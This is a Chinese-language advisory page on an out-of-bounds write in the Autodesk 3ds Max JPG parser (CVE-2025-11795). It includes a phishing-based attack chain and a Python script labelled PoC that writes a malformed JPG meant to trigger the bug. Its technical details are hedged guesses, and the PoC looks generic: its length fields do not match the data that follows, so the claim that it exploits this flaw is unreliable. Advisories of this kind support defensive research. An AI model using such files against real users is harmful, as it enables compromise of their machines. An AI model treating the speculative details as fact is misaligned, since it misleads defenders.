CVE-2025-11795: Autodesk 3ds Max JPG解析Out-of-Bounds Write漏洞

漏洞信息

漏洞编号

CVE-2025-11795

漏洞类型

Out-of-Bounds Write（缓冲区溢出/越界写入）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Autodesk 3ds Max

漏洞概述

CVE-2025-11795是Autodesk 3ds Max软件中的一个高危安全漏洞，CVSS评分达到7.8分。该漏洞因3ds Max在解析恶意构造的JPG图像文件时存在边界验证缺陷，导致攻击者可触发Out-of-Bounds Write（越界写入）条件。当用户打开一个经过精心设计的恶意JPG文件时，攻击者能够利用此漏洞在当前进程的上下文中执行任意代码。由于该漏洞需要用户交互（UI:R）才能触发，攻击者通常需要诱骗目标用户打开恶意文件。一旦成功利用，攻击者可以在受害者的计算机上获得与当前进程相同的权限级别，从而实现远程代码执行、窃取敏感数据、安装恶意软件或完全控制受影响的系统。此漏洞影响3ds Max处理JPG图像文件的组件，属于典型的文件解析类安全漏洞。这类漏洞在3D建模和渲染软件中尤为危险，因为这类软件经常需要处理来自不同来源的图像资源。攻击者可能通过钓鱼邮件、恶意网站或捆绑在其他合法软件中的方式分发恶意JPG文件。由于该漏洞的本地攻击向量（AV:L）特性，攻击者需要先将恶意文件传递给目标用户。

技术细节

该漏洞的根本原因在于Autodesk 3ds Max的JPG图像解析器在处理图像数据时未能正确验证边界条件。当软件读取JPG文件的特定字段（如DHT表、DQT表或图像数据块）时，解析代码可能存在缓冲区大小计算错误或索引验证不足的问题。攻击者可以通过精心构造一个包含畸形数据的JPG文件来触发越界写入。具体来说，恶意JPG文件可能包含：1) 超长的量化表或哈夫曼表数据，超出预期缓冲区大小；2) 异常的图像尺寸参数，导致内存分配不足；3) 精心构造的扫描数据，使解压缩过程中的数据写入超出预定边界。当3ds Max加载此类文件时，解析器会将恶意数据写入相邻的内存区域，可能覆盖重要的函数指针、对象数据或控制流数据。攻击者可以利用这种内存破坏来劫持程序执行流，最终在受害系统上执行任意代码。成功利用此漏洞需要攻击者具备一定的文件格式知识和逆向工程能力，以精确构造能够绕过安全检查的恶意载荷。

攻击链分析

STEP 1

步骤1: 侦察与准备

攻击者收集目标信息，了解目标使用的Autodesk 3ds Max版本，并准备恶意JPG文件。攻击者可能通过开源情报（OSINT）、社交媒体或专业网络获取目标信息。

STEP 2

步骤2: 制作恶意载荷

攻击者精心构造一个包含畸形数据的JPG文件。文件中包含超长的量化表数据（Oversized DQT）、异常的图像尺寸参数和恶意构造的哈夫曼表数据，以触发3ds Max解析器中的边界验证缺陷。

STEP 3

步骤3: 投递恶意文件

攻击者通过钓鱼邮件、恶意网站、水坑攻击或捆绑在其他合法软件中的方式将恶意JPG文件传递给目标用户。文件名通常伪装成合法的项目资源或纹理文件以增加可信度。

STEP 4

步骤4: 诱导用户打开文件

攻击者通过社会工程学手段诱骗目标用户打开恶意JPG文件。由于该漏洞需要用户交互（UI:R），目标用户必须主动打开文件才能触发漏洞。

STEP 5

步骤5: 触发漏洞与代码执行

当3ds Max解析恶意JPG文件时，超长的数据字段导致解析器在处理量化表或哈夫曼表时发生越界写入。恶意数据被写入相邻的内存区域，可能覆盖函数指针或控制流数据。

STEP 6

步骤6: 权限提升与持久化

攻击者成功劫持程序执行流后在当前进程上下文中执行任意代码。由于攻击在用户权限下运行，攻击者可以进一步安装后门、窃取数据或横向移动到其他系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-11795 PoC - Malicious JPG File Generator for Autodesk 3ds Max
This PoC demonstrates the structure of a malicious JPG file that triggers
an Out-of-Bounds Write vulnerability in Autodesk 3ds Max JPG parser.

WARNING: This code is for educational and security research purposes only.
Do not use this code for malicious purposes.
"""

import struct
import os

def create_malicious_jpg():
    """
    Create a malformed JPG file designed to trigger OOB write in 3ds Max
    """
    # Start of Image (SOI) marker
    jpg_data = b'\xFF\xD8'
    
    # APP0 marker (JFIF marker)
    jpg_data += b'\xFF\xE0'
    jpg_data += struct.pack('>H', 16)  # Length
    jpg_data += b'JFIF\x00'  # Identifier
    jpg_data += b'\x01\x01'  # Version 1.1
    jpg_data += b'\x00'  # Aspect ratio units
    jpg_data += struct.pack('>HH', 1, 1)  # Thumbnail dimensions
    
    # DQT marker with oversized data (triggers OOB write)
    jpg_data += b'\xFF\xDB'
    # Length field - set to cause buffer overflow
    oversized_length = 0xFFFF  # Malformed length
    jpg_data += struct.pack('>H', oversized_length)
    
    # Malformed quantization table data
    # This data will cause out-of-bounds write when parsed
    for i in range(128):  # Oversized data
        jpg_data += bytes([(i * 17) % 256])
    
    # SOF0 marker (Start of Frame)
    jpg_data += b'\xFF\xC0'
    jpg_data += struct.pack('>H', 11)  # Length
    jpg_data += b'\x08'  # Precision (8 bits)
    jpg_data += struct.pack('>HH', 1024, 1024)  # Malformed dimensions
    jpg_data += b'\x01\x01'  # Number of components
    jpg_data += b'\x01\x11\x00'  # Component data
    
    # DHT marker with malformed data
    jpg_data += b'\xFF\xC4'
    jpg_data += struct.pack('>H', 0x7FFF)  # Oversized length
    for i in range(256):
        jpg_data += bytes([i])
    
    # SOS marker (Start of Scan)
    jpg_data += b'\xFF\xDA'
    jpg_data += struct.pack('>H', 12)
    jpg_data += b'\x01'  # Number of components
    jpg_data += b'\x01\x00'  # Component selector
    jpg_data += b'\x00\x3F\x00'  # Spectral selection
    
    # Malformed scan data
    for i in range(512):
        jpg_data += bytes([i % 256])
    
    # End of Image (EOI) marker
    jpg_data += b'\xFF\xD9'
    
    return jpg_data

def save_poc():
    """Save the PoC file"""
    output_dir = 'poc_output'
    os.makedirs(output_dir, exist_ok=True)
    
    output_path = os.path.join(output_dir, 'CVE-2025-11795_malicious.jpg')
    jpg_data = create_malicious_jpg()
    
    with open(output_path, 'wb') as f:
        f.write(jpg_data)
    
    print(f'[+] PoC file created: {output_path}')
    print(f'[+] File size: {len(jpg_data)} bytes')
    print('[!] This file is designed to trigger CVE-2025-11795 in Autodesk 3ds Max')
    print('[!] Do not open this file in production environments or systems you do not own')

if __name__ == '__main__':
    save_poc()

影响范围

Autodesk 3ds Max < 2025.2 (未修复版本)

Autodesk 3ds Max 2024 所有版本

Autodesk 3ds Max 2023 所有版本

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 不要打开来源不明的JPG文件，特别是来自不受信任的电子邮件附件或网站下载的文件；2) 在3ds Max中禁用自动加载外部资源的设置；3) 使用企业级邮件安全网关过滤恶意附件；4) 限制员工对互联网的访问权限，减少钓鱼攻击风险；5) 对重要系统实施网络分段，限制潜在攻击的横向移动；6) 定期备份重要数据，确保在遭受攻击时能够快速恢复；7) 监控网络流量和系统日志，及时发现异常行为；8) 对员工进行安全意识培训，提高对钓鱼攻击的识别能力。